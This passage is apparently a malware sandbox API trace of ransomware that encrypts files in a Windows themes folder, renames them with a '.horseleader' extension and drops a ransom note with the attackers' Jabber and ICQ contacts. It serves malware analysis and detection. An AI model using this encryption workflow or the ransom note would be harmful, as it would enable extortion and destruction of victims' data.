lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a44b570, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.482] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.482] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\..") returned 68 [0247.482] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.483] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.483] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17a2e300, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x6cf07e70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17a2e300, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xd0e5, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PIXEL.ELM", cAlternateFileName="")) returned 1 [0247.483] lstrcmpiW (lpString1="PIXEL.ELM", lpString2="Windows") returned -1 [0247.483] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.ELM") returned 75 [0247.483] StrStrIW (lpFirst="PIXEL.ELM", lpSrch=".horseleader") returned 0x0 [0247.483] lstrcmpW (lpString1="PIXEL.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.483] lstrcmpW (lpString1="PIXEL.ELM", lpString2="_uninstalling_.png") returned 1 [0247.483] lstrlenW (lpString=".testttjffg") returned 11 [0247.483] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.ELM", lpSrch=".testttjffg") returned 0x0 [0247.483] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.483] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.483] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\pixel.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.484] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.ELM") returned 75 [0247.484] StrStrW (lpFirst="PIXEL.ELM", lpSrch=".txt") returned 0x0 [0247.484] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=53477) returned 1 [0247.484] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.487] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.488] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.488] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.489] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.489] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.490] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x30e5, lpOverlapped=0x0) returned 1 [0247.490] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffcf1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.490] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x30e5, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x30e5, lpOverlapped=0x0) returned 1 [0247.490] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.490] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.491] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.491] CloseHandle (hObject=0x1a4) returned 1 [0247.491] GetProcessHeap () returned 0x780000 [0247.491] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.491] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.ELM.horseleader") returned 87 [0247.491] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\pixel.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\pixel.elm.horseleader")) returned 1 [0247.492] GetProcessHeap () returned 0x780000 [0247.492] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.492] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a44b570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x21b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PIXEL.INF", cAlternateFileName="")) returned 1 [0247.493] lstrcmpiW (lpString1="PIXEL.INF", lpString2="Windows") returned -1 [0247.493] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.INF") returned 75 [0247.493] StrStrIW (lpFirst="PIXEL.INF", lpSrch=".horseleader") returned 0x0 [0247.493] lstrcmpW (lpString1="PIXEL.INF", lpString2="#Decrypt#.txt") returned 1 [0247.493] lstrcmpW (lpString1="PIXEL.INF", lpString2="_uninstalling_.png") returned 1 [0247.493] lstrlenW (lpString=".testttjffg") returned 11 [0247.493] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.INF", lpSrch=".testttjffg") returned 0x0 [0247.493] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.493] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.493] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\pixel.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.494] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.INF") returned 75 [0247.494] StrStrW (lpFirst="PIXEL.INF", lpSrch=".txt") returned 0x0 [0247.494] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=539) returned 1 [0247.494] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x21b, lpOverlapped=0x0) returned 1 [0247.496] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffde5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.496] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x21b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x21b, lpOverlapped=0x0) returned 1 [0247.496] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.497] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.497] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.497] CloseHandle (hObject=0x1a4) returned 1 [0247.497] GetProcessHeap () returned 0x780000 [0247.497] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.497] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.INF.horseleader") returned 87 [0247.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\pixel.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\pixel.inf.horseleader")) returned 1 [0247.501] GetProcessHeap () returned 0x780000 [0247.501] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.502] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x639, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.502] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.502] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 77 [0247.502] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.502] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.502] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.502] lstrlenW (lpString=".testttjffg") returned 11 [0247.502] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.502] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.502] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.502] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.503] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 77 [0247.503] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.503] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1593) returned 1 [0247.503] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x639, lpOverlapped=0x0) returned 1 [0247.506] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff9c7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.506] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x639, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x639, lpOverlapped=0x0) returned 1 [0247.506] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.506] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.507] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.507] CloseHandle (hObject=0x1a4) returned 1 [0247.507] GetProcessHeap () returned 0x780000 [0247.507] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.507] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.horseleader") returned 89 [0247.507] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif.horseleader")) returned 1 [0247.508] GetProcessHeap () returned 0x780000 [0247.508] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.508] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x54f1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.508] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.508] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 78 [0247.508] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.508] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.509] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.509] lstrlenW (lpString=".testttjffg") returned 11 [0247.509] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.509] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.509] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.509] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.517] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 78 [0247.517] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.517] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=21745) returned 1 [0247.517] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.521] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.521] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.521] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4f1, lpOverlapped=0x0) returned 1 [0247.521] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffb0f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.521] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4f1, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4f1, lpOverlapped=0x0) returned 1 [0247.522] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.522] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.522] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.522] CloseHandle (hObject=0x1a4) returned 1 [0247.523] GetProcessHeap () returned 0x780000 [0247.523] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.523] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.horseleader") returned 90 [0247.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png.horseleader")) returned 1 [0247.524] GetProcessHeap () returned 0x780000 [0247.524] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.524] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x54f1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.524] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.524] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\#Decrypt#.txt") returned 79 [0247.524] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.525] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.525] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.527] lstrlenA 